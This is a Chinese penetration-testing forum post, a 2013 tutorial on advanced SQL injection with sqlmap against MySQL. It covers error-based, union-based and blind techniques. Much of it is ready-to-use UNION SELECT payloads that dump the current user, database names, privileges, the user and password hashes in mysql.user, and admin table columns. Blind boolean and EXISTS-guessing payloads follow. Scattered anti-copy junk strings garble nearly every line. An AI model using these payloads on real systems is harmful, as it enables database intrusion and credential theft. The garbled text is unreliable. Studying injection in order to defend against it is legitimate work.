中国网络渗透测试联盟

标题: sqlmap高级注入 [打印本页]
作者: admin    时间: 2013-7-16 20:31
标题: sqlmap高级注入
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
" V6 ]5 T$ \- O+ j9 Q) Y* Z ' r, o3 X8 Z3 e- ~* p6 l% {, d
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表7 C8 G) B2 X9 S! X' O2 b
  E+ m. L) J/ ]) {& e4 {* D
分类标准        分类        备注
8 s: U/ v" [+ j: H按字段类型        整型注入,字符型注入        3 F5 K6 D' t4 K  L* R+ W; ?+ [
按出现的位置        get注入,post注入,cookie注入,http header注入        . n; H# V* t& a; e& Z
然而高级注入是这样的
8 w. b* L& W' G
" B- f( `, @5 I7 _  _: H7 j高级注入分类        条件
& V/ P7 S7 r8 G* B' G# ]; Rerror-based sql        数据库的错误回显可以返回,存在数据库,表结构1 M7 N3 ]9 W) s0 B; K, ?# U
union-based sql        能够使用union,存在数据库,表结构
7 u, E( f  c8 @' m  H( E5 nblind sql        存在注入
4 v" r- ~' V$ `9 u/ c" A0 ?我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
2 K# {, a, T! c3 e. C/ ]5 d0 x1 V
9 }, ]' I0 E9 x5 K好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火' p4 [8 ?- H7 U0 S0 r
( {) q! p+ s1 t/ L. y. z- ]
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。: u2 e9 ^  V/ C: @$ n5 l
" T2 x) |! Q7 }2 H
这里用mysql说明& n. Z# o# y, \* Q4 |5 n1 {: O
& c  N3 h3 \4 J% O2 X4 u
e注入坛子里很多了,请看戳我或者再戳我9 M0 i7 e" e3 r* K/ v$ c/ [* a  [

3 o) q7 |9 x4 \2 e, P- A+ F* ^$ hu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
7 \4 e& l. R- W/ i, a
/ E% |( Q* @6 x+ S6 b获取当前数据库用户名
" a, F. h4 y  T* \: G7 O* G
6 g; r1 @0 f: e7 K  mUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
9 \; o$ z$ r, P6 p2 B9 t: CAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
& Q0 a0 ?" K# r2 f/ ]L, NULL#
0 k; T% V  W2 E' c1 |% z) s注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
' S+ S2 R- b: |% r5 g
* q8 M% K0 m0 ^. w1 O: t# U获取数据库名6 L% f  h8 P6 |( z( p2 b
0 _$ A6 I9 d' R9 d2 w3 Z
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
6 c% J% V9 K$ Z# \1 C3 x& Z获取所有用户名
' J  j" a. I0 z5 z$ s7 O' k
0 a& A8 r/ Z4 j9 D9 t# s+ u, y) HUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#) q2 `0 U# K' K8 I6 E2 f" [$ p
查看当前用户权限- F  n, G7 I2 s& y4 N7 S

. K" d2 z2 `# fUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
2 d. L1 F$ J5 G) i0 a& u4 @尝试获取密码,当然需要有能读mysql数据库的权限
4 s% E  t8 p3 N
# @9 |, N8 x5 w" \9 FUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#9 ]2 v5 p5 o$ O  [7 |- v' z( a/ \" U" \
获取表名,limit什么的自己搞啦
! b* Q( p1 N9 ]: g1 Z ! ^2 l1 t1 g' H& R& w
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#  E0 ]1 T! Y2 l3 t
获取字段名及其类型
9 H6 D! w% i# U- j& {! mUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#' N. N. Q7 A, |4 `) ?4 |

6 B( v  U3 `% ?1 z$ O, C7 wb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
! }2 i, G$ |% }0 c& A 5 T& d8 a% Y8 r
如:7 y! w! Y0 Q  S* s
获取当前用户名- k2 T& n& x7 X1 J: ~2 N: y
" W& e7 O% a; @' k0 _( K) x! \" |
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
0 d* y7 b4 ]& c获取当前数据库
' a+ V3 R! ]+ w" N , y1 n* k7 c: M
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 1066 r/ u, `" q" J9 w% N
获取表名
% Y( g6 [' Z. {1 ^2 Y ! Q8 c1 q8 R# \3 }: f/ Q6 i
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
! \8 P# ^. D: ^$ N3 ^4 p获取字段名及其类型和爆内容就不说了,改改上面的就可以了。3 O1 U: ~" h0 x
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
) ^' K& N; @- ^1 R& m爆表9 i8 W; G1 m* K* p

3 e$ _" f( ]% u9 U3 }AND EXISTS(select * from table)( \3 m3 V5 `' p2 X* L1 O
爆字段
1 ~. J: U7 r1 o7 u
& m0 _* G  X; l! w( _0 RAND EXISTS(select pwd from table)
. ?# H9 {0 c" G盲注的变化就比较多了,由于篇幅,只是举个例子而已。
! E5 C/ e0 a1 \- ^+ _1 l0 r! N 2 Q4 a6 e/ s' `+ M: T5 r
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
$ W$ I; U# j$ r" p1 b



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2